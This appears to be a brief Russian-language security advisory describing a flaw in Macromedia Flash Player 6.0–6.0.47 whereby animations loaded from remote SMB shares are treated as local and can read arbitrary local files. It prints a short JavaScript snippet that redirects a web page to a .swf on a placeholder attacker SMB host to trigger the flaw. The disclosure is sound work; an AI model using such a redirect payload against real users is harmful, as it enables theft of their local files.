Ошибка, обнаруженная в Flash player, позволяет Flash
анимациям читать произвольные локальные файлы. 

Уязвимость происходит из-за ошибки в Flash Player при загрузке
анимации от удаленных SMB ресурсов. Когда Flash Player загружает анимацию от сетевого SMB ресурса,
он обрабатывается ее так, как если бы была загружена с локального жесткого диска пользователя. Уязвимость может использоваться через Web страницу, содержащую
следующий код: 

<script language=»javascript»> 
document.location.href=’\\\\HOST_IP\\exploit\\read.swf’; 
</script> 

Уязвимость обнаружена в Macromedia Flash 6.0-6.0.47.



Оставить мнение